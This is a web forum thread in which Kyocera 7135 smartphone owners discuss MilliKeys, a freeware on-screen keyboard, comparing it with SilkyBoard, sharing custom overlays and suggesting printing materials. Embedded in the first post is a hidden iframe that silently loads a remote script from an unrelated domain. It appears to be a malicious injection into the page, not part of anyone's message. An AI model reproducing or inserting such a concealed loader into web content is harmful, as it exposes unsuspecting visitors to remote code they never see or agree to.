+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast
    I just read about a product called MilliKeys (http://millikeys.sourceforge.net) that is an Open Source Freeware that seems to do the same thing. You have to print you own Stickie but it looks like it has "similar" features.

I would really like to get some product like this ... soon!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Producing and selling MilliKeys stamps may be an opportunity for someone wanting a little bit of income.

*Hint, hint*!
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by LemonAid
    I just read about a product called MilliKeys (http://millikeys.sourceforge.net) that is an Open Source Freeware that seems to do the same thing. You have to print you own Stickie but it looks like it has "similar" features.

I would really like to get some product like this ... soon!
    MilliKeys looks interesting. It appears to require quite a bit more setup and configuration on the part of the user than is required with SilkyBoard, however that might not be all bad. In some ways it looks like it might be even more flexible and more powerful than SilkyBoard. The only reason I would stick with SilkyBoard at this time is if they provided free (or nominal cost) for updates. I have quitre a bit of $$$ already invested in SilkyBoard.
    Dave

Originally posted by jazmaan
    So - anybody want to test Millikeys on the 7135 and find out if it works for us?
    Count me in. I'd pay for an overlay.

Ok, but who wants to be the first person to actually download Millikeys and mess with a homemade overlay just to find out if it actually works on the 7135? I'm unable to volunteer for that task this month.

My Millikeys "overlay" and configuration

I've played with this program and it works great on the 7135, and is very customizable for entering any character you need using custom overlays. I've attached mine just so you can see how easy it is, plus it allows for a bit bigger letter keys since it does not have a row dedicated to the numbers.
    Enjoy!
    Attached Files

Re: My Millikeys "overlay" and configuration

Originally posted by santa8claws
    I've played with this program and it works great on the 7135, and is very customizable for entering any character you need using custom overlays. I've attached mine just so you can see how easy it is, plus it allows for a bit bigger letter keys since it does not have a row dedicated to the numbers.
    Enjoy!
    Thanks for sharing your custom overlay Santa. One thing I would want to do differently is to include the row dedicated to numbers. One of the important benefits of SilkyBoard for me was the fact that I didn't have to make any extra keystrokes to switch from alpha to numeric and visa versa.

Now...can I sit on your lap and tell you what I want for Christmas??? :crazysant
    Dave

Millikeys

Ok, here' s a new topic dedicated to MILLIKEYS http://millikeys.sourceforge.net.

I've been playing with Santa8Claws custom overlay.
    Someone posted a message about wanting a separate number row. That's really not necessary because you can get any number with one big stroke down from the top row.

Millikeys takes some getting used to. My eyes aren't so good anymore so the secondary characters on the overlay are pretty much indecipherable to me. I have to have a big printout handy just for reference until I get more familiar with the layout.

And I haven't even tried the default layout yet, so I'm not sure how it compares with Santa8Claws layout. Eventually I think I'll want to try the ATOMIK layout available on the Millikeys Sourceforge site, or even make a layout of my own.

Millikeys layouts for 7135

Jazmaan,

Can you cut and paste the other posts from the "SilkyBoard Query with the 7135" thread that talks about Millikeys. That would help get all this information in one message. This application looks like a really great option for the 7135 (and more...).

Thanks for everyones great messages on this board! Just when I think I have finished reading all I need to know about the 7135 - something like this comes alone.

SPS posters Rock!

Administrator

Re: Millikeys layouts for 7135

Originally posted by LemonAid
    Jazmaan,

Can you cut and paste the other posts from the "SilkyBoard Query with the 7135" thread that talks about Millikeys. That would help get all this information in one message. This application looks like a really great option for the 7135 (and more...).

done... :Smoke:

Re: My Millikeys "overlay" and configuration

Originally posted by santa8claws
    Enjoy!
    Santa8Claws -

What software did you use to create your overlay?

Thanks,
    Mike

Has anyone figured out if there is a way to get the "hold" functionality similar to SilkyBoard to work on Millikeys?

For example, I'd like to be able to tap the 'a' key for a lowercase 'a', and hold it for an uppercase 'A'.

Any ideas?

Other than that, Millikeys seems like a great alternative to SilkyBoard. I haven't seen any problems yet on the 7135.

Thanks,
    Mike

Anyone who has been successful in installing and using the app and overlay, can you post the configurations you used to set it up? It seems too confusing to me and time consuming.

Thanks
    Chris Mattix
    Personal Real Estate Consultant

At Staples and other computer/office supply stores there should be transparents to print on. That's what I'm gonna try. I should be able to pick some up later today.

Converged

Overlay printing

What do you print the overlays on?

I want to print and use the overlay from the millikeys website. I would like to us it with a Strong screen protector attaching the overlay to the top. My idea is after I get the overlay size right, print it on Tyvek, (a “plastic” type of paper) using a xerographic color copier (plastic ink!) for durability.

Anybody have any other ideas?

Great forum! My 7135 arrives in less than 6 hours!

Stephen

Converged
    I thought about transparencies. I thought something white might be better like the Tyvek.

Stephen

Re: Overlay printing

Originally posted by srosema
    What do you print the overlays on?

I want to print and use the overlay from the millikeys website. I would like to us it with a Strong screen protector attaching the overlay to the top. My idea is after I get the overlay size right, print it on Tyvek, (a “plastic” type of paper) using a xerographic color copier (plastic ink!) for durability.

Anybody have any other ideas?

Great forum! My 7135 arrives in less than 6 hours!

Stephen
    I haven't done it yet, but here is what I am thinking... I will put a Strong screen protector directly on the graffiti area. I will print my overlay on a label that I will stick on that protector. I will put another protector on top of the label to get the feel on writing on the protector rather than writing on a paper label.

-Mike

Originally posted by srosema
    I thought about transparencies. I thought something white might be better like the Tyvek.

Stephen
    I agree. Wouldn't it be hard to see the characters if you could see the graffiti area behind them? I think a white label would be better.

-Mike

Originally posted by Beryl
    Producing and selling MilliKeys stamps may be an opportunity for someone wanting a little bit of income.

*Hint, hint*!
    Yes, I would pay somebody to do this... especially transparent ones
    Please visit my picture site: Robert-O-Rama :)

p.s. Glow in the dark would be a nice thing to have too
    Please visit my picture site: Robert-O-Rama :)